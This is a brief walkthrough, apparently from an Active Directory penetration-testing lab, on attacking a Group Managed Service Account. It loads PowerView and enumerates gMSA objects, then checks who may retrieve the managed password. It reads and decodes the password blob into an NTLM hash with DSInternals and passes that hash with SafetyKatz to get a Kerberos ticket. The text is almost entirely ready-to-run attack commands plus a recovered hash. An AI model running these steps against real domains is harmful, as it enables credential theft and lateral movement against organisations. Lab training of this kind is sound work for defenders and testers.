Untitled

Enumerating gMSA using PowerView

First Loading PowerView

. .\\PowerView.ps1

Untitled

Now Let’s Enumerate the gMSA

Get-DomainObject -LDAPFilter '(objectClass=msDS-GroupManagedServiceAccount)'

Untitled

Now let’s see who have permissions to read the password blob

Get-ADServiceAccount -Identity jumpone -Properties * | select PrincipalsAllowedToRetrieveManagedPassword

Untitled

Now let’s read the password

$Passwordblob = (Get-ADServiceAccount -Identity jumpone -Properties msDS-ManagedPassword).'msDS-ManagedPassword'
Import-Module C:\\AD\\Tools\\DSInternals_v4.7\\DSInternals\\DSInternals.psd1
$decodedpwd = ConvertFrom-ADManagedPasswordBlob $Passwordblob
ConvertTo-NTHash -Password $decodedpwd.SecureCurrentPassword

Untitled

And we got the hash

Username: jumpone
ntlmhash: 367032486cc36f7ba0561d7e3e90f615

Now let’s OverPass-The-Hash

.\\SafetyKatz.exe "sekurlsa::pth /user:jumpone /ntlm:367032486cc36f7ba0561d7e3e90f615 /domain:us.techcorp.local /ptt"